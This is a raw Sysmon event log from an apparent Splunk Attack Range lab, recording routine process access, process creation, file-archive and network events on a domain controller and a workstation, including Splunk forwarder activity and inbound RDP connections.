10341000x80000000000000001051663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.980{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.979{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.979{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C39-6151-5F7A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.978{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C39-6151-5F7A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.961{5EBD8912-8C39-6151-5F7A-00000000FC01}5812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:42.708{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57712-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001051656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.300{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C39-6151-5E7A-00000000FC01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.299{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.299{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.298{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.298{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.297{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C39-6151-5E7A-00000000FC01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.297{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C39-6151-5E7A-00000000FC01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.280{5EBD8912-8C39-6151-5E7A-00000000FC01}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:45.251{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6916FA62F046E7DA399DEF413E5B49D8,SHA256=707D680F6BABFD8393C189B306E2B05DBDF7CAAC5D307E48D830EA46DEC2ED87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:46.333{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8B79030DE60437AD8D636B4B8E458B7,SHA256=11B7485F669CF03267C82AC3F2FEB2255D75599E48F8F1736BBAB6677E498E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:46.139{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B56C1070EE999BF0EA8E0BDABA6E835,SHA256=50A389ADF78DB965656E6E5B80EF2CB6228631A81BD5DBA8A8E6B3EF997CAA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:46.283{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89B8A0502F3E38B5650558C907770703,SHA256=7767A1FC6677876D2252751D4040FA03560D687FCE26C2C40BCEA2C762A5418C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:47.341{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D213C543AD5D5F0545A48F45CD93B4EE,SHA256=AB6ABE0B5617B7B67BA729824CF756AB5B58E1F69D725D270283CD61BA9F97C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:47.139{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8CEEF01914C8C0655EBE67DB0E562E,SHA256=50C0A22B6B011AE97EFC531E9B4A4D192B67298923F225073E5F008AAB65E96E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:48.155{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CE18C75BF787CFB8F891EF4FB0F9DA5,SHA256=93A1E129F605BADEA6BF80216CA24180610865E49CB60388AB95BE3487C06647,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:48.372{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5EC50ECB265434B11121974E8BCC67,SHA256=07B1831017FE453D5778D17FEF5CDCD141B8014A908954B2E451C7BD27BFBFDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:49.170{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E615856A6FFCDD01EAA27D051B3BCE27,SHA256=E49FB275A3C1151A3839433B72AD79AD4A3409F2408ED058F3C2315AA5299204,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:47.698{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53467-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:49.391{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FF5E89EBD1C995EE35102255B7B8B6,SHA256=9AE9015FFA321CAA1B4FF8EE0A3ACFEDE2C9DA0A9F9E6F10AE21F6EB34D65596,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:48.512{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59877-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001051675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:50.603{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:50.603{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:50.416{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED5916579A4C10F335E6F04CCFC3F94,SHA256=F01DF0EE4E57649F11A92B0FE6F5FD97C3D8025424D2EE867CBA71FFBBA1BF4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:47.762{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59455-false10.0.1.12-8000- 23542300x8000000000000000980066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:50.170{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B712C1941077A8E2766AC27150ED49D8,SHA256=345141D94823D3D7A8D8429C0655DAC5B5D3647F3A7CF0E02F8ABBE2FF121431,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:50.122{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8CFBCCE7987EE8A99A5799BDC75939F,SHA256=4F2B546C07B6BADC4D9B25C3E014EFEF7C2E96EEC6BBE5F552CEB7754FDC754B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:50.186{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62231-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:51.431{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0297AF850ABDB11224F05B879E44060,SHA256=98F40E4A186DAA3D6FD7B69F8CDBC421CDFDADCD138EAB2F886099F169AD69BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:51.420{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E890F73A9904E10FDDD37F2434AD0DE2,SHA256=3485A357C893B7167DD51A864D9943E01A1DD6796508EE5DD63629700D07882A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:51.420{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0498D1C8994359C70EBDF41EB2B74AC6,SHA256=40479069295910D7F8486D4D52CEF015D7811689F62E61CC5312B3BC1D215CBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:51.186{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D7C932F599A39BA1B3B2D0EFF3A25BB,SHA256=1D47277208BBDE45EF047AC54014FEC50084035B00168E04940EA7F083F0D504,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:52.936{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9921213D3B91ADA7BB9D4179FF7D3F15,SHA256=AF9309E1A3E054E56CE037C5CD62D6A8D50F3E8AFADAB88256AE485FC3942A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 